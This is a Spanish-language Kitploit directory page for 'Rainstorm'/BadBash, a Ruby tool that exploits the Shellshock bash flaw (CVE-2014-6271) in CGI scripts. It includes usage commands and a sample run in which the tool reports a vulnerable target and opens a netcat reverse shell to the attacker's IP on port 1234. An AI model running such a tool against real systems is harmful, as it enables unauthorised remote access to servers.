Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Rainstorm — Herramienta RCE CVE-2014-6271 | Kitploit
Herramientas/GitHubGitHub/rainmak3r/rainstorm
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubrainmak3r/rainstorm

Rainstorm

Herramienta RCE CVE-2014-6271

Ver Repositorio
211hace 11 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

BadBash es una herramienta de explotación RCE para CVE-2014-6271. La versión básica solo verifica el sitio CGI HTTP y solo proporciona una shell inversa de netcat en el puerto 1234.

Desarrollador : Andy Yang Versión : 0.1.0 Licencia : GPLv3

================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h

BadBash - Herramienta RCE CVE-2014-6271 por Andy Yang La versión básica solo verifica el sitio HTTP La versión básica solo proporciona una shell inversa de netcat en el puerto 1234

EJEMPLO DE USO:

root@kitploit:~
 ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
 ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Ruta CGI objetivo            Ruta completa de la página CGI
-d, --IP de destino             Tu dirección IP que escucha una conexión entrante
-h, --help                       Muestra ayuda

================================================================================================ Ejemplo de uso.

RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info] Verificando si el objetivo es vulnerable........

[Info] Esto puede tomar hasta 10 segundos........

[Info] ¡El objetivo es vulnerable!!!

[Info] Por favor usa NC para escuchar en el puerto 1234 para la shell inversa..........

[Info] Explotando para una shell inversa que se conecte a 172.16.189.1:1234 vía netcat ..........

Descargar herramienta